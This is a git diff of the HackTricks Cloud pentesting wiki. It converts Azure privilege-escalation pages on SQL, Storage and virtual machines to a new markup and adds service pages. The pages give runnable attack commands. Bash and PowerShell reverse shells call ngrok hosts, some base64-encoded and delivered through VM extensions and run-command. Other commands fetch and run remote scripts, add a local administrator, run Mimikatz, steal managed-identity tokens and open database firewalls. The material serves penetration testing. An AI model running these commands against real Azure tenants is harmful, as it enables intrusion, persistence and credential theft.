+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
+- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
similarity index 59%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
index bf2b2515d..8122224dc 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
@@ -1,32 +1,19 @@
 # Az - SQL Database Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 ## SQL Database Privesc
+
 For more information about SQL Database check:
-{% content-ref url="../az-services/az-sql.md" %}
-[az-sql.md](../az-services/az.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-sql.md
+{{#endref}}
 ### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write" With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
-{% code overflow="wrap" %}
 ```bash
 # Change the server password
 az sql server update \
@@ -42,24 +29,20 @@ az sql server create \
 --admin-user \
 --admin-password
 ```
-{% endcode %}
 Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
-{% code overflow="wrap" %}
 ```bash
 az sql server update \
 --name \
 --resource-group \
 --enable-public-network true
 ```
-{% endcode %}
 ### "Microsoft.Sql/servers/firewallRules/write" An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
-{% code overflow="wrap" %}
 ```bash
 # Create Firewall Rule
 az sql server firewall-rule create \
@@ -77,16 +60,14 @@ az sql server firewall-rule update \
 --start-ip-address \
 --end-ip-address
 ```
-{% endcode %}
-Additionally, ```Microsoft.Sql/servers/outboundFirewallRules/delete``` permission lets you delete a Firewall Rule.
-NOTE: It is necesary to have the public access enabled
+Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule.
+NOTE: It is necesary to have the public access enabled
 ### ""Microsoft.Sql/servers/ipv6FirewallRules/write" With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
-{% code overflow="wrap" %}
 ```bash
 az sql server firewall-rule create \
 --server \
@@ -95,16 +76,14 @@ az sql server firewall-rule create \
 --start-ip-address \
 --end-ip-address
 ```
-{% endcode %}
-Additionally, ```Microsoft.Sql/servers/ipv6FirewallRules/delete``` permission lets you delete a Firewall Rule.
-NOTE: It is necesary to have the public access enabled
+Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule.
+NOTE: It is necesary to have the public access enabled
 ### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read" With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
-{% code overflow="wrap" %}
 ```bash
 az sql server ad-admin create \
 --server \
@@ -112,13 +91,11 @@ az sql server ad-admin create \
 --display-name \
 --object-id
 ```
-{% endcode %}
 ### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read" With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.
-{% code overflow="wrap" %}
 ```bash
 #Enable
 az sql server azure-ad-only-auth enable \
@@ -130,19 +107,5 @@ az sql server azure-ad-only-auth disable \
 --server \
 --resource-group
 ```
-{% endcode %}
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
similarity index 60%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
index 3f3fba06b..d94de30c0 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
@@ -1,27 +1,14 @@
 # Az - Storage Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 ## Storage Privesc For more information about storage check:
-{% content-ref url="../az-services/az-storage.md" %}
-[az-storage.md](../az-services/az-storage.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-storage.md
+{{#endref}}
 ### Microsoft.Storage/storageAccounts/listkeys/action
@@ -45,7 +32,6 @@ az storage account keys renew --account-name --key key2
 A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
-{% code overflow="wrap" %}
 ```bash
 # e.g. set default action to allow so network restrictions are avoided
 az storage account update --name --default-action Allow
@@ -53,7 +39,6 @@ az storage account update --name --default-action Allow
 # e.g. allow an IP address
 az storage account update --name --add networkRuleSet.ipRules value=
 ```
-{% endcode %}
 ## Blobs Specific privesc
@@ -61,9 +46,8 @@ az storage account update --name --add networkRuleSet.ipRules value=<
 The first permission allows to **modify immutability policies** in containers and the second to delete them.
-{% hint style="info" %}
-Note that if an immutability policy is in lock state, you cannot do neither of both
-{% endhint %}
+> [!NOTE]
+> Note that if an immutability policy is in lock state, you cannot do neither of both
 ```bash
 az storage container immutability-policy delete \
@@ -94,9 +78,8 @@ This should allow a user having this permission to be able to perform actions in
 ### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
-With this permission, an attacker can create and update (if has ```Microsoft.Storage/storageAccounts/localusers/read``` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
+With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
-{% code overflow="wrap" %}
 ```bash
 az storage account local-user create \
 --account-name \
@@ -106,35 +89,29 @@ az storage account local-user create \
 --home-directory \
 --has-ssh-key false/true # Depends on the auth method to use
 ```
-{% endcode %}
 ### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
-{% code overflow="wrap" %}
 ```bash
 az storage account local-user regenerate-password \
 --account-name \
 --resource-group \
 --name
 ```
-{% endcode %}
 To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect):
-{% code overflow="wrap" %}
 ```bash
 sftp @.blob.core.windows.net #regenerated-password
 ```
-{% endcode %}
 ### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
-{% code overflow="wrap" %}
 ```bash
 #Restore the soft deleted container
 az storage container restore \
@@ -148,45 +125,28 @@ az storage blob undelete \
 --container-name \
 --name "fileName.txt"
 ```
-{% endcode %}
 ### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
-{% code overflow="wrap" %}
 ```bash
 az storage share-rm restore \
 --storage-account \
 --name \
 --deleted-version
 ```
-{% endcode %}
 ## Other interesting looking permissions (TODO)
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
 ## References
-* [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
-* 
[https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+- [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
+- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
similarity index 85%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
index b558868c5..ee62ce582 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -1,38 +1,25 @@
 # Az - Virtual Machines & Network Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 ## VMS & Network For more info about Azure Virtual Machines and Network check:
-{% content-ref url="../az-services/vms/" %}
-[vms](../az-services/vms/)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/vms/
+{{#endref}}
 ### **`Microsoft.Compute/virtualMachines/extensions/write`** This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\
 Example abusing custom extensions to execute arbitrary commands in a VM:
-{% tabs %}
-{% tab title="Linux" %}
-* Execute a revers shell
+{{#tabs }}
+{{#tab name="Linux" }}
+
+- Execute a revers shell
-{% code overflow="wrap" %}
 ```bash
 # Prepare the rev shell
 echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -48,11 +35,9 @@ az vm extension set \
 --settings '{}' \
 --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
 ```
-{% endcode %}
-* Execute a script located on the internet
+- Execute a script located on the internet
-{% code overflow="wrap" %}
 ```bash
 az vm extension set \
 --resource-group rsc-group> \
@@ -63,13 +48,13 @@ az vm extension set \
 --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
 --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="Windows" %}
-* Execute a reverse shell
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
+- Execute a reverse shell
-{% code overflow="wrap" %}
 ```bash
 # Get encoded reverse shell
 echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -85,11 +70,9 @@ az vm extension set \
 --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand 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"}'
 ```
-{% endcode %}
-* Execute reverse shell from file
+- Execute reverse shell from file
-{% code overflow="wrap" %}
 ```bash
 az vm extension set \
 --resource-group \
@@ -100,21 +83,19 @@ az vm extension set \
 --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
 --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
 ```
-{% endcode %}
 You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
-* Reset password using the VMAccess extension
+- Reset password using the VMAccess extension
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs:
@@ -124,13 +105,11 @@ It's also possible to abuse well-known extensions to execute code or perform pri
 This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
@@ -204,8 +183,9 @@ The last 2 permissions might be avoided by sharing the application with the tena
 Exploitation example to execute arbitrary commands:
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group myResourceGroup \
@@ -240,10 +220,11 @@ az vm application set \
 --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
 --treat-deployment-as-failure true
 ```
-{% endtab %}
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group \
@@ -282,16 +263,17 @@ az vm application set \
 --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
 --treat-deployment-as-failure true
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### `Microsoft.Compute/virtualMachines/runCommand/action` This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:**
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Execute rev shell
 az vm run-command invoke \
@@ -303,9 +285,11 @@ az vm run-command invoke \
 # revshell.sh file content
 echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
 ```
-{% endtab %}
-{% tab title="Windows" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
 # Execute a rev shell
@@ -322,7 +306,7 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1
 ## In Package file link just add any link to a blobl storage file
 export encodedCommand="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"
-# The content of
+# The content of
 echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
@@ -330,8 +314,9 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
 Import-module MicroBurst.psm1
 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### `Microsoft.Compute/virtualMachines/login/action`
@@ -351,7 +336,6 @@ All those are the necessary permissions to **create a VM with a specific managed
 Depending on the situation more or less permissions might be needed to abuse this technique.
-{% code overflow="wrap" %}
 ```bash
 az vm create \
 --resource-group Resource_Group_1 \
@@ -364,14 +348,12 @@ az vm create \
 --location "centralus" # By default pub key from ~/.ssh is used (if none, it's generated there)
 ```
-{% endcode %}
 ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\
 Then, from the metadata service it's possible to generate tokens for each one.
-{% code overflow="wrap" %}
 ```bash
 # Get currently assigned managed identities to the VM
 az vm identity show \
@@ -386,27 +368,15 @@ az vm identity assign \
 /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
 /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
 ```
-{% endcode %}
 Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**:
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
+{{#endref}}
 ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs...
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/README.md b/src/pentesting-cloud/azure-security/az-services/README.md
new file mode 100644
index 000000000..26eacc74b
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/README.md
@@ -0,0 +1,73 @@ +# Az - Services + +{{#include ../../../banners/hacktricks-training.md}} + +## Portals + +You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) + +### Raw requests + +#### Azure API via Powershell + +Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. + +Then query the Azure REST API to get the **subscription ID** and more . + +```powershell +$Token = 'eyJ0eX..' +$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' +# $URI = 'https://graph.microsoft.com/v1.0/applications' +$RequestParams = @{ + Method = 'GET' + Uri = $URI + Headers = @{ + 'Authorization' = "Bearer $Token" + } +} +(Invoke-RestMethod @RequestParams).value + +# List resources and check for runCommand privileges +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: + logging.info('Python HTTP trigger function processed a request.') + IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] + IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] + cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) + val = os.popen(cmd).read() + return func.HttpResponse(val, status_code=200) +``` + +## List of Services + +**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-acr.md b/src/pentesting-cloud/azure-security/az-services/az-acr.md
new file mode 100644
index 000000000..3da5a42d2
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-acr.md
@@ -0,0 +1,52 @@
+# Az - ACR
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services.
+
+### Enumerate
+
+To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1):
+
+```bash
+# List Docker images inside the registry
+IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
+
+Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
+
+Get-AzACR -username -password -registry .azurecr.io
+```
+
+{{#tabs }}
+{{#tab name="az cli" }}
+
+```bash
+az acr list --output table
+az acr show --name MyRegistry --resource-group MyResourceGroup
+```
+
+{{#endtab }}
+
+{{#tab name="Az Powershell" }}
+
+```powershell
+# List all ACRs in your subscription
+Get-AzContainerRegistry
+
+# Get a specific ACR
+Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry"
+```
+
+{{#endtab }}
+{{#endtabs }}
+
+Login & Pull from the registry
+
+```bash
+docker login .azurecr.io --username --password
+docker pull .azurecr.io/:
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
